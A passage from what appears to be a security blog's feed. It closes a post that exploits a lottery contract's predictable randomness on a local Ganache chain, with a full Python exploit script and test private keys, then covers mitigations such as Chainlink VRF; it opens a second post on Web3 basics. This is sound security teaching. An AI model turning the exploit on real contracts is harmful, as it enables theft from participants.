The script begins by setting up a connection to Ganache, a local Ethereum blockchain simulator, using the `web3` library. It connects via HTTP at the default Ganache address (`127.0.0.1:7545`). This step ensures that we’re connected to a blockchain environment where we can deploy and interact with our contract.

```python
ganache_url = &quot;http://127.0.0.1:7545&quot;
web3 = Web3(Web3.HTTPProvider(ganache_url))

# Check connection
if not web3.is_connected():
    print(&quot;Error: Unable to connect to Ganache&quot;)
else:
    print(&quot;Connected to Ganache&quot;)

```

Once connected, the script needs to know the deployed contract’s address and ABI (Application Binary Interface) to interact with it. The ABI describes the contract’s functions and is generated by the Solidity compiler. Here, the ABI is loaded from a JSON file, which was generated during the contract compilation process.

```python
# Contract address and ABI (replace with actual contract address)
contract_address = &quot;0x3da1c86DB9fa85Ba45Cf2DDf5205d41a964800d2&quot;

# Load the ABI from a JSON file
with open(&quot;Lottery.json&quot;) as f:
    contract_json = json.load(f)
    contract_abi = contract_json[&quot;abi&quot;]

# Initialize contract
lottery_contract = web3.eth.contract(address=contract_address, abi=contract_abi)
print(&quot;Contract initialized&quot;)

```

To simulate participants joining the lottery, the script defines a list of player accounts, each with an associated private key (these are test accounts from Ganache). This allows the script to execute transactions on behalf of these accounts, which will be used to call the contract’s `buyTicket` function.

```python
# Replace these with actual Ganache accounts and private keys for testing
players = [
    {&quot;address&quot;: &quot;0x76e4E33674fDc3410Dc7df5E13fa4A5279028425&quot;, &quot;private_key&quot;: &quot;0xe859ec36ddd09c33cff090ea84e2560fba29c2996d9bd9cac3b0d60ddcca8a14&quot;},
    {&quot;address&quot;: &quot;0xE324804B2d3018b8d3Ef7c82343af3499C897c01&quot;, &quot;private_key&quot;: &quot;0x63575a691ba6ac055c6861202668cf62e8eb5527210736f78dedb7dc3a5efa93&quot;},
    {&quot;address&quot;: &quot;0xce47F784C297c0F26c654a1a956121CeEFee8CFf&quot;, &quot;private_key&quot;: &quot;0x0836982a10b4d719bd59d6dfb82ae810eebf33451ad7e9e55b799899c4ec58c0&quot;},
    {&quot;address&quot;: &quot;0x4154F4926135C31e8d9E88F83D8eaFe2749c4189&quot;, &quot;private_key&quot;: &quot;0xc4b5c6855187945c62f7148b3d1ad66ec23a8add6042ea64f27a46dff4d078f0&quot;}
]

```

This part of the script loops through each player in the `players` list, simulating a ticket purchase for each one. It creates a transaction by calling the `buyTicket` function on the contract, sets the ticket price in wei, and assigns necessary parameters like `gas` and `nonce`.

```python
# Set the ticket price in wei
ticket_price = web3.to_wei(0.1, &quot;ether&quot;)

# Loop to add each player to the lottery
for player in players:
    tx = lottery_contract.functions.buyTicket().build_transaction({
        &apos;from&apos;: player[&quot;address&quot;],
        &apos;value&apos;: ticket_price,
        &apos;gas&apos;: 2000000,
        &apos;gasPrice&apos;: web3.to_wei(&apos;50&apos;, &apos;gwei&apos;),
        &apos;nonce&apos;: web3.eth.get_transaction_count(player[&quot;address&quot;]),
    })

```

Each transaction needs to be signed by the player’s private key before it can be sent to the blockchain. The script signs the transaction using `web3.eth.account.sign_transaction`, then sends it with `web3.eth.send_raw_transaction`. After sending, it waits for the transaction to be confirmed and prints a message indicating that the player has successfully joined the lottery.

```python
    # Sign the transaction with the player&apos;s private key
    signed_tx = web3.eth.account.sign_transaction(tx, player[&quot;private_key&quot;])
    tx_hash = web3.eth.send_raw_transaction(signed_tx.raw_transaction)
    receipt = web3.eth.wait_for_transaction_receipt(tx_hash)
    print(f&quot;Player {player[&apos;address&apos;]} joined the lottery.&quot;)

```

## Selecting the Winner

In this section, I won’t go over the connection setup or how we initialize the contract with the ABI, as that was covered in detail in the previous section. Instead, we’ll jump straight into how the script works to retrieve the current players, select a winner, and award the prize.

&lt;details&gt;
&lt;summary&gt;Select winner script&lt;/summary&gt;

```python
from web3 import Web3
import time
import json

# Connection setup
ganache_url = &quot;http://127.0.0.1:7545&quot;
web3 = Web3(Web3.HTTPProvider(ganache_url))

# Check connection
if not web3.is_connected():
    print(&quot;Error: Unable to connect to Ganache&quot;)
else:
    print(&quot;Connected to Ganache&quot;)

# Contract address and ABI (replace with actual contract address)
contract_address = &quot;0x3da1c86DB9fa85Ba45Cf2DDf5205d41a964800d2&quot;

# Load the ABI from a JSON file
with open(&quot;Lottery.json&quot;) as f:
    contract_json  = json.load(f)
    contract_abi = contract_json[&quot;abi&quot;]

# Initialize contract
lottery_contract = web3.eth.contract(address=contract_address, abi=contract_abi)
print(&quot;Contract initialized&quot;)

# Owner&apos;s address and private key
owner_address = &quot;0x68F99487Ad21cE05859C38Cc8B2a1f78fA452cE8&quot;  # Replace with the owner&apos;s address
owner_private_key = &quot;0xd6d215c98c4fd42ddb7b1a8ab89275bc284412267ef3f300cb61ef6fcb0d4d4e&quot;   # Replace with the owner&apos;s private key

try:
    # Retrieve and print the list of players with their indices
    players = lottery_contract.functions.getPlayers().call()
    print(&quot;Current players in the lottery:&quot;)
    for index, player_address in enumerate(players):
        print(f&quot;Index {index}: {player_address}&quot;)
    # Build the transaction to call pickWinner
    tx = lottery_contract.functions.pickWinner().build_transaction({
        &apos;from&apos;: owner_address,
        &apos;gas&apos;: 2000000,
        &apos;gasPrice&apos;: web3.to_wei(&apos;50&apos;, &apos;gwei&apos;),
        &apos;nonce&apos;: web3.eth.get_transaction_count(owner_address),
    })

    # Sign the transaction with the owner&apos;s private key
    signed_tx = web3.eth.account.sign_transaction(tx, owner_private_key)

    # Send the transaction and wait for the receipt
    tx_hash = web3.eth.send_raw_transaction(signed_tx.raw_transaction)
    tx_receipt = web3.eth.wait_for_transaction_receipt(tx_hash)

    print(&quot;pickWinner executed successfully. Prize awarded to the winner.&quot;)
    print(&quot;Transaction hash:&quot;, tx_hash.hex())

    # Retrieve the winner&apos;s address with the getWinner view function
    winner_address = lottery_contract.functions.getWinner().call()
    print(&quot;Winner of the lottery:&quot;, winner_address)

except Exception as e:
    print(&quot;Error executing pickWinner:&quot;, e)


```
&lt;/details&gt;


To begin, we retrieve the list of current players by calling `getPlayers` on our contract. This function returns a list of addresses, each representing a participant in the lottery. The script then loops through this list and prints each player’s address alongside its index, which helps us keep track of who’s currently entered.

```python
# Retrieve and print the list of players with their indices
players = lottery_contract.functions.getPlayers().call()
print(&quot;Current players in the lottery:&quot;)
for index, player_address in enumerate(players):
    print(f&quot;Index {index}: {player_address}&quot;)

```

Now that we have the list of players, it’s time to prepare the transaction to call `pickWinner`. Since only the contract owner can execute this function, we specify the owner’s address, along with necessary transaction details like `gas`, `gasPrice`, and `nonce`. The `nonce` is automatically fetched to make sure this transaction is unique.

```python
tx = lottery_contract.functions.pickWinner().build_transaction({
    &apos;from&apos;: owner_address,
    &apos;gas&apos;: 2000000,
    &apos;gasPrice&apos;: web3.to_wei(&apos;50&apos;, &apos;gwei&apos;),
    &apos;nonce&apos;: web3.eth.get_transaction_count(owner_address),
})

```

To validate and authorize the transaction, we sign it using the owner’s private key. This step is essential, as it verifies that the transaction is coming from the correct account. Once signed, we send it to the blockchain and wait for confirmation that it’s been processed successfully.

```python
# Sign the transaction with the owner&apos;s private key
signed_tx = web3.eth.account.sign_transaction(tx, owner_private_key)

# Send the transaction and wait for the receipt
tx_hash = web3.eth.send_raw_transaction(signed_tx.raw_transaction)
tx_receipt = web3.eth.wait_for_transaction_receipt(tx_hash)
print(&quot;pickWinner executed successfully. Prize awarded to the winner.&quot;)
print(&quot;Transaction hash:&quot;, tx_hash.hex())

```

Finally, after the `pickWinner` function executes, we retrieve the winning player’s address by calling `getWinner` on the contract. This allows us to see which participant won the lottery, giving us the outcome of this round.

```python
# Retrieve the winner&apos;s address with the getWinner view function
winner_address = lottery_contract.functions.getWinner().call()
print(&quot;Winner of the lottery:&quot;, winner_address)

```

## Understanding the Exploit

Finally, we’ll explore how an attacker could exploit our lottery contract by monitoring conditions to determine the best time to join, thereby maximizing their chances of winning. Here’s how the exploit works, starting with an overview of the prediction function and then examining how the attacker waits for favorable conditions before joining.

&lt;details&gt;
&lt;summary&gt;Exploit code&lt;/summary&gt;

```python
from web3 import Web3
import time
import json

# Connection setup
ganache_url = &quot;http://127.0.0.1:7545&quot;
web3 = Web3(Web3.HTTPProvider(ganache_url))

# Check connection
if not web3.is_connected():
    print(&quot;Error: Unable to connect to Ganache&quot;)
else:
    print(&quot;Connected to Ganache&quot;)

# Contract address and ABI (replace with actual contract address)
contract_address = &quot;0x3da1c86DB9fa85Ba45Cf2DDf5205d41a964800d2&quot;

# Load the ABI from a JSON file
with open(&quot;Lottery.json&quot;) as f:
    contract_json  = json.load(f)
    contract_abi = contract_json[&quot;abi&quot;]

# Initialize contract
lottery_contract = web3.eth.contract(address=contract_address, abi=contract_abi)
print(&quot;Contract initialized&quot;)

# Attacker&apos;s account and private key (ensure this is a test account)
attacker_address = &quot;0xa7E1Dce14Bb439e6710c18e05C0DA71EAd3d0203&quot;
attacker_private_key = &quot;0x85ebe111f9cd1878845c72b10affa75fcbf300123a70c79f01cfbf65cdcd4b50&quot;

# Ticket price in wei (e.g., 0.1 ether)
ticket_price = web3.to_wei(0.1, &quot;ether&quot;)

# Predict the winning index based on block number and players list length
def predict_winner_index(block_number, players):
    hash_value = web3.solidity_keccak(
        [&quot;uint256&quot;, &quot;uint256&quot;],  # Same as Solidity&apos;s abi.encodePacked(uint256, uint256)
        [block_number, len(players)]
    )
    return int(hash_value.hex(), 16) % len(players)

# Wait for a favorable condition
try:
    players = lottery_contract.functions.getPlayers().call()

    if len(players) &gt; 0:
        simulated_players = players + [attacker_address]

        while True:
            # Look ahead: assume pickWinner will execute about two blocks from now
            current_block = web3.eth.get_block(&quot;latest&quot;)
            block_number = current_block.number + 2

            # Predict the winner index if the attacker joins
            predicted_index = predict_winner_index(block_number, simulated_players)

            # Check if the attacker would be the winner
            if simulated_players[predicted_index] == attacker_address:
                print(&quot;Favorable condition! Joining the lottery now would likely result in a win.&quot;)

                # Build the transaction to join the lottery
                tx = lottery_contract.functions.buyTicket().build_transaction({
                    &apos;from&apos;: attacker_address,
                    &apos;value&apos;: ticket_price,
                    &apos;gas&apos;: 2000000,
                    &apos;gasPrice&apos;: web3.to_wei(&apos;50&apos;, &apos;gwei&apos;),
                    &apos;nonce&apos;: web3.eth.get_transaction_count(attacker_address),
                })

                # Sign and send the transaction
                signed_tx = web3.eth.account.sign_transaction(tx, attacker_private_key)
                tx_hash = web3.eth.send_raw_transaction(signed_tx.raw_transaction)
                receipt = web3.eth.wait_for_transaction_receipt(tx_hash)
                print(f&quot;Attacker {attacker_address} successfully joined the lottery.&quot;)
                break
            else:
                print(&quot;Not favorable to join yet. Waiting for the next block...&quot;)
                web3.provider.make_request(&quot;evm_mine&quot;, [])

            # Wait for a short period before rechecking (simulate waiting for a new block)
            time.sleep(1)  # Adjust this delay as needed for your environment
    else:
        print(&quot;No players in the lottery yet.&quot;)
except Exception as e:
    print(&quot;Error:&quot;, e)

```
&lt;/details&gt;


To predict the winner, we use a custom `predict_winner_index` function, which mimics the contract’s formula for calculating the winner. This function takes two inputs: the block number and the length of the players array. By hashing these values together, we can calculate the index of the expected winner, simulating the way the contract selects the winner based on predictable on-chain data.

```python
def predict_winner_index(block_number, players):
    hash_value = web3.solidity_keccak(
        [&quot;uint256&quot;, &quot;uint256&quot;],  # Mimics Solidity&apos;s abi.encodePacked(uint256, uint256)
        [block_number, len(players)]
    )
    return int(hash_value.hex(), 16) % len(players)

```

Next, the script retrieves the current list of players in the lottery. If there are players present, the attacker prepares a simulated list of participants by adding their own address to the end. This allows them to predict the outcome if they join.

```python
players = lottery_contract.functions.getPlayers().call()
if len(players) &gt; 0:
    simulated_players = players + [attacker_address]

```

The attacker then enters a loop, monitoring each new block to check whether joining would likely make them the winner. In each iteration, the script reads the latest block number, looks a couple of blocks ahead (approximating when `pickWinner` will execute), and calculates the predicted winning index with the attacker included. This lets the attacker assess when they would have the best chance of winning.

```python
while True:
    current_block = web3.eth.get_block(&quot;latest&quot;)
    block_number = current_block.number + 2  # Assume pickWinner executes about two blocks from now

    # Predict the winner index if the attacker joins
    predicted_index = predict_winner_index(block_number, simulated_players)

```

If the predicted index corresponds to the attacker’s address, it indicates a favorable condition to join. At this point, the attacker immediately submits a transaction to join the lottery, signing it with their private key to validate it. This transaction is then sent to the blockchain, where the attacker is added as a player.

```python
if simulated_players[predicted_index] == attacker_address:
   print(&quot;Favorable condition! Joining the lottery now would likely result in a win.&quot;)

   tx = lottery_contract.functions.buyTicket().build_transaction({
       &apos;from&apos;: attacker_address,
       &apos;value&apos;: ticket_price,
       &apos;gas&apos;: 2000000,
       &apos;gasPrice&apos;: web3.to_wei(&apos;50&apos;, &apos;gwei&apos;),
       &apos;nonce&apos;: web3.eth.get_transaction_count(attacker_address),
   })

   signed_tx = web3.eth.account.sign_transaction(tx, attacker_private_key)
   tx_hash = web3.eth.send_raw_transaction(signed_tx.raw_transaction)
   receipt = web3.eth.wait_for_transaction_receipt(tx_hash)
   print(f&quot;Attacker {attacker_address} successfully joined the lottery.&quot;)
   break

```

If the prediction isn’t favorable, the script waits briefly and then simulates a new block. This allows the attacker to continuously monitor and retry until they find an ideal block where their chances of winning are high.

```python
else:
    print(&quot;Not favorable to join yet. Waiting for the next block...&quot;)
    web3.provider.make_request(&quot;evm_mine&quot;, [])
    time.sleep(1)

```

## **Connecting the Scripts to Execute the Exploit**

In this final section, we’ll look at how these scripts come together to create a scenario where an attacker could successfully manipulate the lottery and win the prize.

First, we start by running `addUser.py` to simulate multiple players joining the lottery. As shown in the screenshot, each player joins successfully, and their addresses are displayed to confirm their entries. This setup builds up the `players` array, setting the stage for our attacker to carefully time their entry.

![](/content/images/2024/11/image-2.png)

Next, we run `exploit.py`, which simulates the attacker waiting for favorable conditions to join. You can see in the output that the script patiently checks each block, waiting until the conditions are just right. Each time it’s not favorable to join, the script simply waits for the next block. Eventually, it detects a favorable block, printing the message: “Favorable condition! Joining the lottery now would likely result in a win.” The attacker’s address is then successfully added to the players list.

![](/content/images/2024/11/image-3.png)

Finally, we execute `selectWinner.py`, which calls the `pickWinner` function to determine the lottery winner. As shown in the last screenshot, the transaction completes, and the winner’s address is displayed. Notably, the winner matches the attacker’s address, confirming that the exploit worked as intended. The transaction hash is also displayed, providing a full record of the event on the blockchain.

![](/content/images/2024/11/image-4.png)

# Securing the Lottery Contract: Mitigating Predictability

To prevent the vulnerabilities we’ve seen in this lottery contract, we need to introduce a more secure approach to randomness. The main issue in the current contract is that it relies on publicly accessible, predictable data (the block number and player count) to select a winner. This opens the door for attackers to manipulate their entry timing and take advantage of the contract’s predictability. Here are a few solutions that could make the lottery contract significantly more secure.

## Use an External Randomness Source: Chainlink VRF

One of the most reliable ways to generate secure randomness on the blockchain is to use an oracle-based solution like **Chainlink VRF (Verifiable Random Function)**. Chainlink VRF provides a tamper-proof source of randomness that cannot be influenced by miners or other participants. Here’s how it would work:

-   When the contract owner is ready to pick a winner, they would request randomness from Chainlink VRF.
-   Chainlink VRF generates a random number off-chain and returns it to the contract, along with cryptographic proof that it was generated securely.
-   The contract verifies the proof and uses the random number to select a winner from the players array.

This approach significantly reduces the risk of manipulation, as the random number generation happens off-chain and cannot be influenced by any participants or miners.

#### Example Integration

Here&apos;s a basic idea of what integrating Chainlink VRF might look like in Solidity:

&lt;details&gt;
&lt;summary&gt;Example of how to use Chainlink VRF&lt;/summary&gt;

```solidity
import &quot;@chainlink/contracts/src/v0.8/VRFConsumerBase.sol&quot;;

contract SecureLottery is VRFConsumerBase {
    address public owner;
    address[] public players;
    bytes32 internal keyHash;
    uint256 internal fee;
    uint256 public ticketPrice = 0.01 ether; // Example entry price
    address public winner;

    modifier onlyOwner() {
        require(msg.sender == owner, &quot;Caller is not the owner&quot;);
        _;
    }

    constructor() VRFConsumerBase(
        0xYourVRFCoordinatorAddress, // VRF Coordinator
        0xYourLinkTokenAddress       // LINK Token
    ) {
        owner = msg.sender;
        keyHash = 0xYourKeyHash;
        fee = 0.1 * 10 ** 18; // LINK fee (depends on the network)
    }

    function buyTicket() public payable {
        require(msg.value == ticketPrice, &quot;Invalid ticket price&quot;);
        players.push(msg.sender);
    }

    function pickWinner() public onlyOwner {
        require(players.length &gt; 0, &quot;No players have joined&quot;);
        require(LINK.balanceOf(address(this)) &gt;= fee, &quot;Not enough LINK&quot;);
        requestRandomness(keyHash, fee);
    }

    function fulfillRandomness(bytes32 requestId, uint256 randomness) internal override {
        uint256 winnerIndex = randomness % players.length;
        winner = players[winnerIndex];
        payable(winner).transfer(address(this).balance);
        delete players;
    }
}

```
&lt;/details&gt;


## Commit-Reveal Scheme

Another alternative, though less secure than Chainlink VRF, is the **commit-reveal scheme**. In this approach, participants (or even the contract itself) commit to a secret value during the entry phase. Once all entries are closed, the secret values are revealed, and a hash of these values is used to determine the winner. This method prevents participants from altering their entries after seeing others’ contributions, adding a layer of unpredictability.
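
The commitment and verification steps described above can be sketched off-chain in a few lines of Python. This is an illustrative model, not Solidity: the names are made up for the example, and `sha3_256` stands in for the EVM keccak256.

```python
import hashlib
import secrets

def commit(value: int, salt: bytes) -> str:
    # During the entry phase each player publishes only this hash
    return hashlib.sha3_256(salt + value.to_bytes(32, "big")).hexdigest()

def reveal_and_pick(reveals, num_players):
    # After entries close, players reveal (value, salt); each reveal is
    # verified against its commitment, then all values are combined to
    # derive the winner index.
    combined = hashlib.sha3_256()
    for value, salt in reveals:
        combined.update(salt + value.to_bytes(32, "big"))
    return int(combined.hexdigest(), 16) % num_players

# Entry phase: players choose secrets and publish commitments
players = []
for _ in range(3):
    value, salt = secrets.randbelow(2**64), secrets.token_bytes(16)
    players.append((value, salt, commit(value, salt)))

# Reveal phase: each reveal must hash back to the stored commitment
for value, salt, commitment in players:
    assert commit(value, salt) == commitment

winner = reveal_and_pick([(v, s) for v, s, _ in players], len(players))
print("Winner index:", winner)
```

Because no single participant controls all of the revealed secrets, none of them can fully determine the combined hash in advance.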

However, the commit-reveal scheme is more complex to implement and is still vulnerable to certain attacks (like front-running). For true security, it’s often better to rely on external, verifiable randomness.

## Blockhash Limitations

Some developers attempt to use `blockhash` from previous blocks as a source of randomness. However, `blockhash` should be avoided in most cases, as miners can influence its value and it becomes unreliable after a certain number of blocks. While using the hash of a much older block could provide slight unpredictability, it’s generally insufficient for securing valuable assets and does not eliminate the risk of miner manipulation.
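
To see why on-chain inputs fail here, consider this Python model (illustrative names, with `sha3_256` standing in for keccak256): any observer can recompute a blockhash-derived index before deciding whether to join.

```python
import hashlib

def winner_index(block_hash: bytes, num_players: int) -> int:
    # Mirrors a contract doing: uint(keccak256(blockhash(n))) % players.length
    return int.from_bytes(hashlib.sha3_256(block_hash).digest(), "big") % num_players

# The block hash is public: the contract and every observer see the same value
public_block_hash = bytes.fromhex("ab" * 32)  # stand-in for a real block hash

contract_result = winner_index(public_block_hash, 10)
attacker_prediction = winner_index(public_block_hash, 10)

# The "random" outcome is known in advance to everyone on the network
print(contract_result == attacker_prediction)
```

Hashing the input adds no secrecy; only an input that is unpredictable at commitment time (such as a VRF output) breaks this symmetry.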

# Conclusions

This exploration of a vulnerable lottery contract has highlighted the critical importance of randomness in blockchain applications. By carefully analyzing the contract’s structure and predictable selection mechanism, we demonstrated how an attacker could leverage this predictability to manipulate the outcome. The experiment showed that when block data or participant counts are used as inputs for &quot;random&quot; selections, they can become points of vulnerability, leaving contracts open to exploitation.

Using Ganache allowed us to control the environment fully, making it easier to illustrate the exploit in action. However, it’s essential to remember that, in a real-world setting, continuously fluctuating block numbers and dynamic participation would make this kind of manipulation more challenging—though not impossible. This reinforces the need for secure and verifiable randomness in lottery or chance-based contracts.

For developers, the key takeaway is to avoid relying on simple on-chain data for critical functions that require unpredictability. Using secure randomness solutions, such as Chainlink VRF (Verifiable Random Function), can provide the tamper-proof randomness needed to prevent these kinds of attacks.

Ultimately, understanding these vulnerabilities is a vital step toward building more secure smart contracts. By identifying and addressing potential weaknesses, we can create more robust decentralized applications that protect users and maintain fairness in all scenarios.

# References

-   Chainlink VRF - Verifiable Randomness for Smart Contracts. &quot;Chainlink Documentation.&quot; Available at: https://docs.chain.link/vrf/v2/introduction/
-   Web3.py - A Python Library for Interacting with Ethereum. &quot;Web3.py Documentation.&quot; Available at: [https://web3py.readthedocs.io/](https://web3py.readthedocs.io/)
-   Truffle - Development Framework for Ethereum. &quot;Truffle Suite Documentation.&quot; Available at: https://trufflesuite.com/docs/
-   Ethereum - Open-Source Blockchain Platform for Smart Contracts. &quot;Ethereum Whitepaper.&quot; Available at: https://ethereum.org/en/whitepaper/
-   JSON-RPC API - Ethereum JSON-RPC Documentation. &quot;Ethereum Wiki.&quot; Available at: https://eth.wiki/json-rpc
-   Solidity Security - Best Practices for Secure Smart Contracts. &quot;Solidity Documentation: Security Considerations.&quot; Available at: https://docs.soliditylang.org/en/v0.8.0/security-considerations.html
-   Zed - Code Editor for Developers. &quot;Zed Documentation.&quot; Available at: [https://zed.dev/](https://zed.dev/)</content:encoded><author>Ruben Santos</author></item><item><title>Pentesting Web3: Setting Up a Smart Contract Testing Environment</title><link>https://www.kayssel.com/post/web3-1</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-1</guid><description>Web3 transforms the internet with decentralization via blockchain, empowering users over data and security. This article covers blockchain basics, smart contracts, security risks, common vulnerabilities, and lays groundwork for upcoming articles on Web3 attacks and secure development practices</description><pubDate>Sun, 03 Nov 2024 09:50:33 GMT</pubDate><content:encoded># **Introduction to Web3 and Blockchain Security**

As the internet moves toward a new era known as Web3, we’re seeing a shift from centralized platforms—where companies control data and infrastructure—to a decentralized model that places more power in the hands of users. This new internet, built on blockchain technology, introduces exciting possibilities with decentralized applications (dApps) and smart contracts that operate independently, without any single authority.

But with this shift comes a unique set of security challenges. Unlike traditional systems where security issues can often be quickly patched, Web3&apos;s reliance on blockchain&apos;s immutable structure makes fixing vulnerabilities after deployment much more complex. As a result, understanding and securing Web3 applications is more critical than ever.

This article series will walk you through the fundamentals of Web3 and blockchain technology, covering everything from key terminology to hands-on smart contract deployment. Along the way, we’ll explore common vulnerabilities and dive into tools and techniques to keep decentralized systems safe. By the end, you’ll not only understand the power of Web3 but also be equipped with the skills to protect it.

Let’s start by exploring the essential concepts behind Web3, blockchain, and smart contracts and discover what makes security such a top priority in this new era of the internet.

# How Does Blockchain Work?

To really get Web3, it helps to understand how blockchain—the technology behind it—all fits together. At its core, blockchain is like a super-secure, digital ledger for tracking transactions and assets, but with a twist. Instead of being stored on a single, centralized server controlled by one authority, blockchain is spread out across a network of computers, where each one (called a “node”) holds a complete copy of the ledger. This decentralized structure is what gives Web3 its strength and independence.

Here’s how it works: every time there’s a new entry, it’s stored in a &quot;block&quot; that includes recent transactions, a timestamp, and a unique identifier, or “hash.” Each new block links to the one before it by referencing that previous block&apos;s hash, creating an unbreakable “chain” of data. Thanks to this chaining, if anyone tries to alter information in a block, it will change the hash, which breaks the chain and alerts the network. This setup makes blockchain incredibly hard to tamper with.
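
The chaining described above can be sketched in a few lines of Python. This is a teaching model with illustrative field names, using sha256 as the hash function:

```python
import hashlib
import json

def block_hash(block: dict) -> str:
    # The hash covers the transactions, timestamp, and previous hash
    return hashlib.sha256(json.dumps(block, sort_keys=True).encode()).hexdigest()

# Build a tiny three-block chain; each block references its predecessor
chain = []
prev = "0" * 64  # the genesis block has no predecessor
for i in range(3):
    block = {"txs": [f"tx-{i}"], "timestamp": 1700000000 + i, "prev_hash": prev}
    chain.append(block)
    prev = block_hash(block)

def is_valid(chain: list) -> bool:
    # Recompute every link; any edit to an earlier block breaks a later link
    for earlier, later in zip(chain, chain[1:]):
        if later["prev_hash"] != block_hash(earlier):
            return False
    return True

print(is_valid(chain))          # the untampered chain verifies
chain[0]["txs"] = ["evil-tx"]   # alter history in block 0
print(is_valid(chain))          # the broken link is detected
```

Changing block 0 changes its hash, which no longer matches the `prev_hash` stored in block 1, so the tampering is immediately visible to every node.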

One of blockchain’s standout features is its immutability. Once something is recorded on the blockchain, changing it is almost impossible. This quality is perfect for Web3 applications that prioritize security, transparency, and trust. But, there’s a downside: in traditional databases, you can update records to fix errors. On the blockchain, mistakes or code vulnerabilities stick around, which can be a headache to correct.

# What is a Smart Contract?

Smart contracts are at the heart of Web3 and form the backbone of most decentralized apps, or dApps. Put simply, a smart contract is a self-running program on the blockchain that automatically enforces a set of rules between different parties. Think of it as a digital contract that doesn’t need middlemen—once the conditions set in the contract are met, it just takes action on its own.

Traditional contracts usually require trust in a third party, like a lawyer or a bank. But with smart contracts, there’s no need for that; they’re “trustless,” meaning they rely purely on blockchain’s code and consensus rules. For example, in a crowdfunding campaign, a smart contract could automatically release funds to the project creator if they reach their goal by a specific date. If not, the money gets returned to the backers—no middleman required.

Smart contracts are typically written in programming languages like Solidity (a popular choice for Ethereum-based contracts) and live on the blockchain, making them transparent and easy to verify. However, once a smart contract is deployed, its code is set in stone. This immutability is both an advantage and a drawback: while it ensures transparency and security, it also means any bugs or vulnerabilities can’t be easily fixed.

Since smart contracts often manage valuable assets, security is key. If there’s a flaw in the code, attackers could exploit it, potentially leading to big financial losses for users. One well-known example of this is the 2016 DAO Hack, where millions were lost due to a vulnerability in the contract’s code. This is why secure coding practices and thorough testing are essential when developing smart contracts.

# Key Blockchain Terminology

Before diving into smart contract deployment and interaction, it&apos;s important to familiarize yourself with some foundational blockchain terms that haven’t been covered yet but are essential for understanding the ecosystem. These concepts will frequently come up when working with smart contracts, exploring blockchain structures, and analyzing transactions. Here’s a quick guide to these essential terms:

## **Account**

Think of an account as your “profile” on the blockchain, which has its own unique address (a long hexadecimal code) and balance. There are two main types of accounts, and each has a specific role:

1.  **Externally Owned Account (EOA):**  
    This type of account is managed by a private key (think of it like a password) that you control through a wallet, such as MetaMask. EOAs are able to send transactions, including those that interact with smart contracts. Essentially, this is the “personal” account you use to control assets and initiate actions on the blockchain.
2.  **Contract Account:**  
    A contract account is created when a smart contract is deployed on the blockchain. Unlike EOAs, contract accounts don’t have private keys and can’t initiate actions on their own. Instead, they react to transactions initiated by EOAs or other contracts. This account type represents the smart contracts themselves.

## **Transaction**

Transactions are how accounts interact with each other and with the blockchain. A transaction is any action that changes the state of the blockchain—whether it’s transferring cryptocurrency or running a function in a smart contract. Every transaction has three main parts:

1.  **Sender:** The account initiating the transaction.
2.  **Recipient:** The account receiving it.
3.  **Value:** The amount of cryptocurrency (if any) being sent.

Each transaction also includes a **gas price** and **gas limit**, which cover the cost of computation needed to process the transaction. After being verified by validators, a transaction is permanently recorded on the blockchain.

## **Validator**

Validators are critical for keeping the blockchain accurate and secure. They verify each transaction against network rules, ensuring it’s legitimate before adding it to the blockchain. Validators are compensated with **gas fees** for their work. The selection process for validators varies by consensus mechanism (e.g., Proof of Stake or Proof of Work), but their core function remains the same: maintaining blockchain integrity by validating transactions.

## **Gas**

Gas is a fee users pay for blockchain transactions, compensating validators for the computational work involved. Each transaction requires a certain amount of gas, calculated as **gas used × gas price**:

-   **Gas Price:** The amount of Ether (ETH) a user is willing to pay per unit of gas, usually measured in gwei (1 gwei = 0.000000001 ETH). A higher gas price can speed up transaction processing, as validators prioritize these transactions.
-   **Gas Limit:** The maximum gas a user is willing to pay for a transaction. More complex transactions (e.g., smart contract interactions) need higher limits. If the limit is too low, the transaction fails, but any gas consumed up to that point is still charged.
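
The fee formula above is easy to check with concrete numbers. A small Python sketch, using example values and the fixed 21,000-gas cost of a plain ETH transfer:

```python
GWEI = 10**9   # 1 gwei in wei
ETH = 10**18   # 1 ether in wei

gas_used = 21_000       # fixed cost of a simple ETH transfer
gas_price = 50 * GWEI   # 50 gwei, chosen by the sender

# Total fee = gas used x gas price, paid in wei
fee_wei = gas_used * gas_price
print(fee_wei / ETH, "ETH")  # 0.00105 ETH
```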

## **Gas Fees**

Gas fees are the total cost a user pays to execute a transaction on the blockchain. Fees are deducted from the user’s balance and given to the validator. During peak network activity, gas fees can increase as users compete to have their transactions processed faster.

## **Nonce**

A **nonce** is a counter associated with each account’s transactions. It keeps transactions in the correct order and prevents **replay** (the same signed transaction being processed twice). Each new transaction from an account must use the next nonce in sequence, ensuring the transaction order stays unambiguous.
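
A toy model of this check (illustrative Python, not actual client logic) shows how a replayed or out-of-order nonce gets rejected:

```python
class ToyAccountState:
    # Tracks the next expected nonce for each account address
    def __init__(self):
        self.expected_nonce = {}

    def apply(self, sender: str, nonce: int) -> str:
        expected = self.expected_nonce.get(sender, 0)
        if nonce != expected:
            return "rejected: bad nonce"
        self.expected_nonce[sender] = expected + 1
        return "accepted"

state = ToyAccountState()
print(state.apply("0xalex", 0))  # accepted
print(state.apply("0xalex", 1))  # accepted
print(state.apply("0xalex", 1))  # rejected: bad nonce (a replay of the same tx)
```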

## **Token**

A token represents a digital asset on the blockchain, commonly following standards like ERC-20 for **fungible tokens** (identical units, like currency) and ERC-721 for **non-fungible tokens (NFTs)** (unique items, like digital collectibles). Tokens serve various roles within decentralized apps (dApps), such as representing assets, utilities, or value, and can be transferred or traded.

## **Wallet**

A wallet is an app that helps users manage accounts, store private keys, and interact with the blockchain. Popular wallets like MetaMask allow users to send transactions, store tokens, and connect to dApps. Importantly, wallets don’t actually store assets; they store private keys, which control access to blockchain assets. Keeping private keys secure is crucial, as they’re the only way to access your account.

## **Explorer**

A **blockchain explorer** (such as Etherscan for Ethereum) is a tool for viewing all public data on the blockchain, including transactions, blocks, accounts, and smart contracts. Explorers provide transparency, enabling users to verify transactions, monitor account activity, and even review smart contract code.

# How It All Connects

Let’s go through an example that ties together the different concepts we’ve covered to understand them more clearly. Imagine Alex wants to use a decentralized finance (DeFi) app to earn interest by lending cryptocurrency.

